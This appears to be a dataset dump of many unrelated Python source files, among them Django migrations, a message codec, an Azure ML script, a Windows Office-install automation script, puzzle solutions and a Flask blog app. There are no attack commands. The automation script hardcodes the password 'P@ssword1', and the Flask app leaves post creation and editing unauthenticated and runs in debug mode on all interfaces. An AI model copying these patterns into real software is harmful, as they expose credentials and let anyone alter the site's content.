text stringlengths 38 1.54M |
|---|
def ubahHuruf(teks,a,b):
x = teks
y = a
z = b
for p in range(len(z)):
x = x.replace(y[p],z[p])
print(x)
ubahHuruf('MATEMATIKA','T','S')
|
import torch
from torch.nn import Module
class RaLSGANLoss(Module):
def __init__(self):
super(RaLSGANLoss, self).__init__()
def forward(self, C_ij, C_ik):
return (torch.mean((C_ij - C_ik.mean() - 1) ** 2) + torch.mean((C_ik - C_ij.mean() + 1) ** 2)) * 0.5
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: sw=4 ts=4 fenc=utf-8 et
# ==============================================================================
# Copyright © 2009 UfSoft.org - Pedro Algarvio <ufs@ufsoft.org>
#
# License: BSD - Please view the LICENSE file for additional information.
# ==============================================================================
from setuptools import setup
import sshg
setup(name=sshg.__package__,
version=sshg.__version__,
author=sshg.__author__,
author_email=sshg.__email__,
url=sshg.__url__,
download_url='http://python.org/pypi/%s' % sshg.__package__,
description=sshg.__summary__,
long_description=sshg.__description__,
license=sshg.__license__,
platforms="OS Independent - Anywhere Twisted and Mercurial is known to run.",
keywords = "Twisted Mercurial SSH ACL HG",
packages=['sshg'],
install_requires = ['simplejson', 'SQLAlchemy', 'decorator'],
package_data={
'sshg': ['upgrades/*.cfg']
},
classifiers=[
'Development Status :: 5 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
]
)
|
# Generated by Django 3.0.2 on 2020-01-05 17:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Matches_Pred',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('league', models.CharField(max_length=5)),
('MW', models.IntegerField(default=0)),
('HomeTeam', models.CharField(max_length=200)),
('AwayTeam', models.CharField(max_length=200)),
('model', models.CharField(max_length=5)),
('prediction', models.CharField(max_length=5)),
('Result', models.CharField(max_length=10)),
('result_binary', models.IntegerField()),
('corrected', models.IntegerField()),
('proba', models.FloatField(default=0)),
],
),
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-20 20:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Chat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('deleted', models.BooleanField(default=False)),
('time', models.DateTimeField(auto_now=True)),
('group', models.CharField(default='', max_length=50)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='has_chats', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=200)),
('text', models.TextField(blank=True, null=True)),
('created_time', models.DateTimeField(default=django.utils.timezone.now)),
],
),
migrations.CreateModel(
name='Friend',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('friend', models.ManyToManyField(related_name='friend', to=settings.AUTH_USER_MODEL)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='FriendNotification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(default='', max_length=100)),
('types', models.CharField(default='', max_length=20)),
('reciever', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reciever_friend', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sender_friend', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Group',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subject', models.CharField(default='', max_length=50)),
('address', models.CharField(default='', max_length=100)),
('size', models.IntegerField(default=1)),
('introduction', models.CharField(default='', max_length=400)),
('cost', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
('date_begin', models.DateTimeField()),
('date_end', models.DateTimeField()),
('time', models.DateTimeField(auto_now_add=True)),
('member', models.ManyToManyField(related_name='member', to=settings.AUTH_USER_MODEL)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='owner', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='GroupNotification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(default='', max_length=100)),
('types', models.CharField(default='', max_length=20)),
('group', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.Group')),
('reciever', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_reciever', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_sender', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=20)),
('last_name', models.CharField(max_length=20)),
('age', models.CharField(blank=True, default='', max_length=20)),
('bio', models.CharField(blank=True, default='', max_length=420)),
('image', models.ImageField(blank=True, default='empty.png', upload_to='photos')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(default='', max_length=100)),
('status', models.CharField(default='incomplete', max_length=100)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.Group')),
('reciever', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reciever', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=40)),
('address', models.CharField(default='', max_length=100)),
('cost', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
('rank', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
('visitor', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Rank',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rank', models.IntegerField(default=5)),
('place', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='place', to='SportsLover.Place')),
],
),
migrations.CreateModel(
name='Sale',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('charge_id', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
name='SportsClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40)),
],
),
migrations.CreateModel(
name='SportsItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.CharField(max_length=40)),
('label', models.ManyToManyField(to='SportsLover.SportsClass')),
],
),
migrations.AddField(
model_name='group',
name='place',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.Place'),
),
migrations.AddField(
model_name='group',
name='sportsclass',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.SportsClass'),
),
migrations.AddField(
model_name='group',
name='sportsitem',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.SportsItem'),
),
migrations.AddField(
model_name='comment',
name='place',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='SportsLover.Place'),
),
]
|
import struct
from itertools import izip
from enums import (CommandMessageSubtype, MessageSubtype, MessageType,
MessageValueType, MessengerType, ParamFlags, NodeSignals)
from utils import grouped
class MessageDescription(object):
def __init__(self, message):
self.type = message
self.arg_types = [MessageValueType[slot].value for slot in message._slot_types]
self.arg_names = message.__slots__
class Parameter(object):
def __init__(self, name, param_id,
description=None, param_type=MessageValueType.nothing, value=None, flags=ParamFlags.normal.value):
self.id = param_id
self.name = name
self.description = description
self.flags = flags
self.value = value
self.type = param_type
_TO_BYTES = {
MessageValueType.nothing.value: lambda x: None,
MessageValueType.bool.value: lambda x: struct.pack(b'?', x),
MessageValueType.int8.value: lambda x: struct.pack(b'b', x),
MessageValueType.uint8.value: lambda x: struct.pack(b'B', x),
MessageValueType.int16.value: lambda x: struct.pack(b'h', x),
MessageValueType.uint16.value: lambda x: struct.pack(b'H', x),
MessageValueType.int32.value: lambda x: struct.pack(b'i', x),
MessageValueType.uint32.value: lambda x: struct.pack(b'I', x),
MessageValueType.int64.value: lambda x: struct.pack(b'l', x),
MessageValueType.uint64.value: lambda x: struct.pack(b'L', x),
MessageValueType.float32.value: lambda x: struct.pack(b'f', x),
MessageValueType.float64.value: lambda x: struct.pack(b'd', x),
MessageValueType.string.value: lambda x: x,
MessageValueType.raw.value: lambda x: x
}
_FROM_BYTES = {
MessageValueType.nothing.value: lambda x: None,
MessageValueType.bool.value: lambda x: struct.unpack(b'?', x)[0],
MessageValueType.int8.value: lambda x: struct.unpack(b'b', x)[0],
MessageValueType.uint8.value: lambda x: struct.unpack(b'B', x)[0],
MessageValueType.int16.value: lambda x: struct.unpack(b'h', x)[0],
MessageValueType.uint16.value: lambda x: struct.unpack(b'H', x)[0],
MessageValueType.int32.value: lambda x: struct.unpack(b'i', x)[0],
MessageValueType.uint32.value: lambda x: struct.unpack(b'I', x)[0],
MessageValueType.int64.value: lambda x: struct.unpack(b'l', x)[0],
MessageValueType.uint64.value: lambda x: struct.unpack(b'L', x)[0],
MessageValueType.float32.value: lambda x: struct.unpack(b'f', x)[0],
MessageValueType.float64.value: lambda x: struct.unpack(b'd', x)[0],
MessageValueType.string.value: lambda x: x,
MessageValueType.raw.value: lambda x: x
}
class _BaseMessageCodec(object):
def encode_init_msg(self, msgr_id, transport_protocol,
msgr_type, name, dev_name, dev_type):
return [msgr_type.value +
dev_type.value +
transport_protocol.value,
name,
dev_name,
msgr_id]
class RawMessageCodec(_BaseMessageCodec):
def encode_raw_message(self, message):
encoded_message = [MessageType.Common.value,
MessageSubtype.Reply.value]
if isinstance(message, list):
encoded_message.extend(message)
else:
encoded_message.append(message)
return encoded_message
class ROSMessageCodec(_BaseMessageCodec):
def __init__(self, msgr_type, reply_type, request_type=None, feedback_type=None):
self.reply = MessageDescription(reply_type)
self.request = None
self.feedback = None
if msgr_type == MessengerType.Service:
self.request = MessageDescription(request_type)
if msgr_type == MessengerType.Action:
self.feedback = MessageDescription(feedback_type)
super(ROSMessageCodec, self).__init__()
def encode_init_msg(self, msgr_id, transport_protocol, msgr_type, name, dev_name, dev_type):
encoded_message = super(ROSMessageCodec, self).\
encode_init_msg(msgr_id, transport_protocol, msgr_type, name, dev_name, dev_type)
encoded_message.extend(self._encode_msg_desc(self.reply))
if self.request:
encoded_message.append(b'')
encoded_message.extend(self._encode_msg_desc(self.request))
if self.feedback:
encoded_message.append(b'')
encoded_message.extend(self._encode_msg_desc(self.feedback))
return encoded_message
def encode_reply_msg(self, messenger_id, msg):
encoded_message = [MessageType.Common.value,
MessageSubtype.Reply.value,
messenger_id]
encoded_message.extend(self._encode_msg_data(self.reply, msg))
return encoded_message
def encode_feedback_msg(self, msg):
assert self.feedback is not None, 'No Feedback'
encoded_message = [MessageType.Common.value,
MessageSubtype.Feedback.value]
encoded_message.extend(self._encode_msg_data(self.feedback, msg))
return encoded_message
def decode_request_msg(self, msg):
assert self.request is not None, 'No Request'
decoded_params = []
#why 1?
for (param_type, arg) in izip(self.request.arg_types, msg[3:]):
decoded_params.append(_FROM_BYTES[param_type](arg))
return self.request.type(*decoded_params)
@staticmethod
def _encode_msg_desc(msg_desc):
encoded_msg_desc = []
for var_name, var_type in izip(msg_desc.arg_names, msg_desc.arg_types):
encoded_msg_desc.append(var_name)
encoded_msg_desc.append(var_type)
return encoded_msg_desc
@staticmethod
def _encode_msg_data(msg_desc, message):
decoded_args = []
for var_name, var_type in izip(msg_desc.arg_names, msg_desc.arg_types):
decoded_args.append(_TO_BYTES[var_type](getattr(message, var_name)))
return decoded_args
class CommandCodec(object):
@staticmethod
def encode_command_init(command):
encoded_message = [command.msgr_id,
struct.pack('i', command.id),
command.name,
command.description,
command.usage.value]
if command.params is None:
encoded_message.append('')
else:
for name, v_type in izip(command.param_names, command.params):
encoded_message.append(name)
encoded_message.append(v_type.value)
encoded_message.append('')
if command.repl is None:
encoded_message.append('')
else:
for name, v_type in izip(command.repl_names, command.repl):
encoded_message.append(name)
encoded_message.append(v_type.value)
return encoded_message
@staticmethod
def decode_command_call(call_message):
#0 and 1 indexes are Command(contains CommandInit) and Request values
decoded_message = { 'command_id': struct.unpack(b'i', call_message[3])[0],
'call_id': call_message[4],
'args': call_message[5:] }
return decoded_message
@staticmethod
def decode_command_call_args(arg_types, args):
if not arg_types:
return []
if arg_types[0] == MessageValueType.raw:
return [args]
return [_FROM_BYTES[arg_type.value](arg) for arg_type, arg in izip(arg_types, args)]
@staticmethod
def encode_command_reply(command_id, call_id, reply_desc, reply):
encoded_message = [MessageType.Command.value,
struct.pack('i', command_id),
CommandMessageSubtype.Reply.value,
call_id]
if not reply:
return encoded_message
if reply_desc[0] == MessageValueType.raw:
encoded_message.extend(reply)
return encoded_message
if isinstance(reply, list):
for reply_type, param in izip(reply_desc, reply):
encoded_message.append(_TO_BYTES[reply_type.value](param))
return encoded_message
encoded_message.append(_TO_BYTES[reply_desc[0].value](reply))
return encoded_message
class ParamsCodec(object):
@staticmethod
def decode_params_info_yaml(params):
decoded_info = {}
for (index, (name, value)) in enumerate(params.iteritems()):
decoded_info[index] = (Parameter(name,
index,
value['description'] if 'description' in value else None,
MessageValueType[value['type']] if 'type' in value else MessageValueType.nothing,
value['value'] if 'value' in value else None,
value['flags'] if 'flags' in value else ParamFlags.normal.value))
return decoded_info
@staticmethod
def decode_params(params, changes):
decoded_result = []
for index, value in grouped(changes, 2):
command_id = struct.unpack('i', index)[0]
parameter = params[command_id]
decoded_result.append((parameter, _FROM_BYTES[parameter.type.value](value)))
return decoded_result
@staticmethod
def encode_params_info(params):
result = []
for param in params:
param_type = param.type.value
result.extend([struct.pack('i', param.id),
param.name,
param.description,
struct.pack('B', param.flags),
param_type])
value = _TO_BYTES[param_type](param.value)
if type(value) is list:
result.extend(value)
else:
result.append(value)
return result
@staticmethod
def encode_params_yaml(params):
return {param.name: param.value for param in params.itervalues()}
@staticmethod
def encode_params_info_yaml(params):
return {param.name: {'flags': param.flags,
'type': param.type.name,
'description': param.description,
'value': param.value} for param in params.itervalues()}
class NodeSignalsCodec(object):
@staticmethod
def encode_node_signal(signal, data):
result = [MessageType.NodeSignal.value, signal.value]
if data:
result.extend(data)
return result
@staticmethod
def decode_node_signal(msg):
msg_length = len(msg)
signal = NodeSignals(msg[1])
data = None if msg_length <= 2 else msg[2 : msg_length]
return (signal, data)
class NodeMessageCodec(object):
@staticmethod
def encode_node_initialization(name):
return [MessageType.NodeInitialization.value, name]
|
from scripts.archive import load_config
from os import scandir, remove
def clean_archive():
config = load_config()
with scandir(config['zip_path']) as archives:
for archive in archives:
if not archive.name.startswith('.') and archive.is_file():
remove(archive.path)
|
from azureml.core import ScriptRunConfig, Experiment
from azureml.core import Workspace
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
from azureml.core import Environment
from azureml.widgets import RunDetails
from azureml.core.authentication import ServicePrincipalAuthentication
svc_pr = ServicePrincipalAuthentication(
tenant_id="xxxxxxxxx-xxxxxx-xxxx-xxxx-xxxxxxx",
service_principal_id="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx",
service_principal_password="xxxxxxxxxxxxxxxxxxxxxx")
ws = Workspace(
subscription_id="xxxxxxxx-xxxxxxx-xxxx-xxx-xxxxxxxxx",
resource_group="rg-machinelearning",
workspace_name="machinelearning",
auth=svc_pr
)
print("Found workspace {} at location {}".format(ws.name, ws.location))
print('Workspace name: ' + ws.name,
'Azure region: ' + ws.location,
'Subscription id: ' + ws.subscription_id,
'Resource group: ' + ws.resource_group, sep = '\n')
# create or load an experiment
experiment = Experiment(ws, 'MyExperiment')
# create or retrieve a compute target
cluster = ws.compute_targets['cluster1']
# create or retrieve an environment
env = Environment.get(ws, name='AzureML-sklearn-0.24.1-ubuntu18.04-py37-cpu-inference')
# configure and submit your training run
src = ScriptRunConfig(source_directory='.',
command=['bash setup.sh && python train.py'],
compute_target=cluster,
environment=env)
run = experiment.submit(config=src)
run |
from util import do, p, BetaScript, kill, usernames
import subprocess, time, os, os.path
p("Importing s_05!")
def s_05():
# Don't call any other functions, it's called in the function below
# I'm just a fucking moron and coded it like a piece of shit
score = install_office() # 1 test 1 operation
for x in range(2):
BetaScript("send {LWin}")
time.sleep(.2)
BetaScript("send {Lwin}")
p("Ran 3 operations 3 tests {}% pass".format((score/1)*100))
def office_login():
do("powershell start microsoft-edge:http://aka.ms/365")
script1 = """WinActivate, Sign in to your account
PixelGetColor, EOffice, 1894, 283, RGB
PixelGetColor, ELock, 358, 125, RGB
PixelGetColor, EBar, 1957, 572, RGB
send, !{tab}
sleep, 500
send, %EOffice%%ELock%%EBar%{enter}"""
script2 = """WinActivate, Sign in to your account
sleep, 500
Send, {fname}.{lname}@mssummit.net{tab}
sleep, 500
Send, P@ssword1
sleep 200
send {tab}
sleep 200
send {space}
sleep, 500
send {enter}"""
while True:
time.sleep(5)
if str(BetaScript(script1, True)) == str('0xEB3C000x107C100xF'):
break
else:
p("Waiting 5 seconds...")
time.sleep(.75)
BetaScript(script2.format(fname=usernames()['fname'], lname=usernames()['lname'], tab="{tab}", space="{space}", enter="{enter}"))
return True
def download_office_exe():
script1 = """WinActivate, Office 365
sleep 500
PixelGetColor, EOfficeLogo, 525, 385, RGB ;0x0D9390F
PixelGetColor, EUpperBar, 814, 217, RGB ;0x000000
PixelGEtColor, ENotify, 2392, 211, RGB ; 0xF
PixelGetColor, EInstall, 2052, 717, RGB ;0x0D9390F
PixelGetColor, EWord, 899, 676, RGB ;0x2B579A
PixelGetColor, EExcel, 1111, 642, RGB ;0x207346
PixelGetColor, EOnenote, 1621, 663, RGB ;0x80397B
;0xD9390F0x0000000xD9390F0x2B579A0x2073460xD1B7CF
;0xD9390F0x0000000xD9390F0x2B579A0x2073460x80397B
Send, !{tab}
sleep, 500
Send, %EOfficeLogo%%EUpperBar%%EInstall%%EWord%%EExcel%%EOnenote%%ENotify%{enter}"""
script2 = """send, #1
sleep 1000
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {space}
sleep 250
send, {tab}{space}
sleep, 250
send, {tab}{enter}"""
while True:
time.sleep(3)
if str(BetaScript(script1, True)) != str("0xD9390F0x0000000xD9390F0x2B579A0x2073460x80397B0xF"):
p("Will try again in 3 seconds...")
else:
break
BetaScript(script2)
while True:
time.sleep(15)
check = os.listdir("C:\\Users\\CIO\\Downloads\\")
okay = False
for f in check:
if f.startswith("Setup") and "O365ProPlus" in f and f.endswith('.exe'):
okay = f
break
if okay:
break
else:
p("Will try again in 15 seconds...")
kill()
return "C:\\Users\\CIO\\Downloads\\" + f
def install_office():
office_login()
f = download_office_exe()
do(f)
while True:
p("Checking to see if build completed...")
time.sleep(3),
check = os.path.exists("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\excel.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\lync.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msaccess.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\mspub.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\onenote.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\outlook.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\powerpnt.exe")
check = check and os.path.isfile("C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\winword.exe")
if check:
time.sleep(5)
kill("OfficeC2RClient.exe", True)
return True
else:
p("Error Code: MA_365II")
if __name__ == "__main__":
s_05()
|
#659. Split Array into Consecutive Subsequences
#Given an integer array nums that is sorted in ascending order, return true if and only if you can split it into one or more subsequences such that each subsequence consists of consecutive integers and has a length of at least 3.
#Example 1:
#Input: nums = [1,2,3,3,4,5]
#Output: true
#Explanation:
#You can split them into two consecutive subsequences :
#1, 2, 3
#3, 4, 5
class Solution:
def isPossible(self, nums: List[int]) -> bool:
## greedy algorithm
## O(n), O(n)
## traverse the nums:
## if attaching to the end: seq[num]-=1; seq[num+1]+=1;
## if start a new sequence: stored[nums]/stored[nums+1]/ stored[nums+2] -=1, seq[nums+2]+=1
## else: false
seq = defaultdict(int) ## key: last number of the existing sequence, value: counts of this last number
stored = Counter(nums) ### counter
for num in nums:
## ignore the second and the third number of the new sequence created before
if stored[num]==0:
continue
## if attaching to the end
if num-1 in seq and seq[num-1]>0:
seq[num-1]-=1
seq[num]+=1
stored[num]-=1
## if start a new sequence
elif num in stored and num+1 in stored and num+2 in stored and \
stored[num]>0 and stored[num+1]>0 and stored[num+2]>0:
seq[num+2]+=1
stored[num]-=1
stored[num+1]-=1
stored[num+2]-=1
else:
return False
return True
|
a = 699
b = 124
def a_update(n):
return (n * 16807) % 2147483647
def b_update(n):
return (n * 48271) % 2147483647
N = 40000000
count = 0
a_tmp = a
b_tmp = b
for i in range(N):
a_tmp = a_update(a_tmp)
b_tmp = b_update(b_tmp)
if (a_tmp & 0xffff) == (b_tmp & 0xffff):
count += 1
print(count)
N = 5000000
count = 0
a_tmp = a
b_tmp = b
for i in range(N):
while True:
a_tmp = a_update(a_tmp)
if (a_tmp % 4) == 0:
break
while True:
b_tmp = b_update(b_tmp)
if (b_tmp % 8) == 0:
break
if (a_tmp & 0xffff) == (b_tmp & 0xffff):
count += 1
print(count)
|
# -*- coding: utf-8 -*-
"""
Physical constants used in code
"""
PARSEC = 3.086e18 # pc in cm
C = 299792.458 # c in km/s |
from flask import Flask, render_template, redirect, url_for, jsonify, request
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from werkzeug.security import generate_password_hash, check_password_hash
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, URL
from flask_ckeditor import CKEditor, CKEditorField
from datetime import datetime
from flask_login import login_user, login_required, LoginManager, current_user, logout_user, UserMixin, \
AnonymousUserMixin
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.environ.get("SECRET_KEY")
ckeditor = CKEditor(app)
Bootstrap(app)
# CONNECT TO DB
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get("DATABASE_URL1")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.__init__(app)
# CONFIGURE TABLE
class BlogPost(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(250), unique=True, nullable=False)
subtitle = db.Column(db.String(250), nullable=False)
date = db.Column(db.String(250), nullable=False)
body = db.Column(db.Text, nullable=False)
author = db.Column(db.String(250), nullable=False)
img_url = db.Column(db.String(250), nullable=False)
class Comment(db.Model):
id = db.Column(db.Integer, primary_key=True)
comment = db.Column(db.String(250), nullable=False, unique=False)
name = db.Column(db.String(30), nullable=False, unique=False)
blog_id = db.Column(db.Integer, nullable=False)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(250), nullable=False)
name = db.Column(db.String(30), nullable=False, unique=True)
password = db.Column(db.String(250), nullable=False)
db.create_all()
@login_manager.user_loader
def user_loader(user_id):
return User.query.get(user_id)
class CommentForm(FlaskForm):
comment = CKEditorField("Comment", validators=[DataRequired()])
submit = SubmitField("Submit")
class RegisterForm(FlaskForm):
email = StringField("Email", validators=[DataRequired()])
name = StringField("Name", validators=[DataRequired()])
password = StringField("Password", validators=[DataRequired()])
submit = SubmitField("Submit")
class Login(FlaskForm):
email = StringField("Email", validators=[DataRequired()])
password = StringField("Password", validators=[DataRequired()])
submit = SubmitField("Submit")
# WTForm
class CreatePostForm(FlaskForm):
title = StringField("Blog Post Title", validators=[DataRequired()])
subtitle = StringField("Subtitle", validators=[DataRequired()])
author = StringField("Your Name", validators=[DataRequired()])
img_url = StringField("Blog Image URL", validators=[DataRequired(), URL()])
body = CKEditorField("Blog Content", validators=[DataRequired()])
submit = SubmitField("Submit Post")
@app.route('/')
def get_all_posts():
posts_array = []
posts = db.session.query(BlogPost).all()
for post in posts:
posts_array.append(post)
return render_template("index.html",
all_posts=posts_array)
@app.route("/post/<int:index>", methods=["POST", "GET"])
def show_post(index):
requested_post = BlogPost.query.get(index)
form = CommentForm()
if request.method == "POST":
try:
name = current_user.name
except:
return redirect(url_for("login"))
else:
comment = form.comment.data
new_comment = Comment(comment=comment, name=name, blog_id=int(index))
db.session.add(new_comment)
db.session.commit()
return redirect(url_for("show_post", index=index))
elif request.method == "GET":
comments = Comment.query.filter_by(blog_id=int(index))
return render_template("post.html", post=requested_post, form=form, comments=comments)
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/contact")
def contact():
return render_template("contact.html")
@app.route("/newpost", methods=["POST", "GET"])
def new_post():
form = CreatePostForm()
if request.method == "POST":
blog_post = BlogPost(
title=form.title.data,
subtitle=form.subtitle.data,
body=form.body.data,
author=form.author.data,
img_url=form.img_url.data,
date=f"{datetime.now().month}-{datetime.now().day}-{datetime.now().year}"
)
db.session.add(blog_post)
db.session.commit()
return redirect(url_for("get_all_posts"))
return render_template("make-post.html", form=form)
@app.route("/edit/id/<int:id>", methods=["POST", "GET"])
def edit(id):
form = CreatePostForm()
post = BlogPost.query.get(id)
if request.method == "GET":
form.title.data = post.title
form.subtitle.data = post.subtitle
form.body.data = post.body
form.author.data = post.author
form.img_url.data = post.img_url
return render_template("edit.html", form=form, id=id)
elif request.method == "POST":
post.title = form.title.data
post.subtitle = form.subtitle.data
post.body = form.body.data
post.author = form.author.data
post.img_url = form.img_url.data
db.session.commit()
return redirect(url_for('get_all_posts'))
@app.route("/register", methods=["POST", "GET"])
def register():
form = RegisterForm()
if request.method == "POST":
hash_password = generate_password_hash(password=form.password.data,
salt_length=8)
new_user = User(email=form.email.data,
name=form.name.data,
password=hash_password)
db.session.add(new_user)
db.session.commit()
return redirect(url_for("get_all_posts"))
elif request.method == "GET":
return render_template("register.html", form=form)
@app.route("/login", methods=["POST", "GET"])
def login():
form = Login()
if request.method == "POST":
email = form.email.data
password = form.password.data
user = User.query.filter_by(email=email).first()
if check_password_hash(pwhash=user.password, password=password):
login_user(user=user)
return redirect(url_for("get_all_posts"))
elif request.method == "GET":
return render_template(template_name_or_list="login.html", form=form)
@app.route("/logout")
@login_required
def logout():
login_user()
return redirect(url_for('get_all_posts'))
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
|
__author__ = 'KeithW'
from xml.dom.minidom import *
from .RPGXMLUtilities import *
class ConversationLine(object):
NOT_ATTEMPTED = 0
SUCCEEDED = 1
FAILED = -1
REWARDED = 2
def __init__(self, text : str):
self.text = text
self.completed = False
def is_completed(self):
return self.completed
def attempt(self):
self.completed = True
return self.completed
class Conversation(object):
def __init__(self, owner : str, linear: bool = True):
self.owner = owner
self._lines = []
self.linear = linear
self.current_line = 0
def add_line(self, new_line : ConversationLine):
self._lines.append(new_line)
def is_completed(self):
completed = True
for line in self._lines:
if line.is_completed() is False:
completed = False
break
return completed
# Get the next line in the conversation
def get_next_line(self):
# If this conversation has been completed...
if self.is_completed():
# then just pick a line at random that is still available
line = self._lines[random.randint(0,len(self._lines)-1)]
# Else cycle through the lines in sequence
else:
line = self._lines[self.current_line]
# Move to the next line of the conversation
self.current_line += 1
# If you have reached the end of the conversation then go back to the beginning
if self.current_line >= len(self._lines):
self.current_line = 0
return line
def print(self):
print("%s conversation." % self.owner)
for line in self._lines:
print(str(line))
class ConversationFactory(object):
def __init__(self, file_name : str):
self.file_name = file_name
self._dom = None
self._conversations = {}
def get_conversation(self, npc_name : str):
if npc_name in self._conversations.keys():
return self._conversations[npc_name]
else:
return None
def print(self):
for conversation in self._conversations.values():
conversation.print()
# Load in the quest contained in the quest file
def load(self):
self._dom = parse(self.file_name)
assert self._dom.documentElement.tagName == "conversations"
logging.info("%s.load(): Loading in %s", __class__, self.file_name)
# Get a list of all conversations
conversations = self._dom.getElementsByTagName("conversation")
# for each conversation...
for conversation in conversations:
# Get the main tags that describe the conversation
npc_name = xml_get_node_text(conversation, "npc_name")
